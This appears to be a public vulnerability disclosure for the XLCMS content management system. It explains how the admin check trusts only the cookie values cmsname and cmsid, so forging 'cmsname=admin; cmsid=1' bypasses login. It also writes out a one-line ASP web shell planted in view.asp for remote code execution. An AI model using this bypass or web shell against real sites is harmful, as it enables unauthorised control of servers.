漏洞概要
关注数(24)
关注此漏洞
漏洞标题:XLCMS后台绕过登陆+Getshell
漏洞作者: 浅蓝
提交时间:2014-12-10 16:44
修复时间:2015-03-10 16:46
公开时间:2015-03-10 16:46
漏洞类型:文件上传导致任意代码执行
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
Tags标签:
无
漏洞详情
披露状态:
2014-12-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-03-10: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
XLCMS后台绕过登陆+Getshell
详细说明:
http://www.ycxl.net/
XLCMS官网
随便拿了一个网站的后台 弱口令登陆 发现有文件管理功能
顺便看了看后台登陆的代码
包含了check.asp
再去看看check.asp
有木有发现只对cmsid 和cmsname 做了验证
我们再来看下登陆后的cookie
cmsname=admin; cmsid=1 没有password(密码)
。。。。设计这个程序的程序员,应该拖出去斩了
Cmsname= 就是管理员的用户名
Cmsid= 就是管理员的id
通常 用户名都为 admin 管理员的id 肯定是1了
如果管理员的账号不是默认的admin呢? 没关系,随便找一个新闻看作者的名称
我们现在来构造cookie
用火狐浏览器的firebug插件改一下cookie
这时我们再访问/admin/index.asp 验证成功啊有木有
Getshell
用以下数据包提交 (把 *** 换成xlcms的网站就行)
提交后就会在网站根目录下的view.asp文件加上 一句<%eval request("x")%>
用菜刀连接http://****/view.asp 密码为“x”。
漏洞证明:
修复方案:
版权声明:转载请注明来源 浅蓝@乌云
漏洞回应
漏洞评价:
评论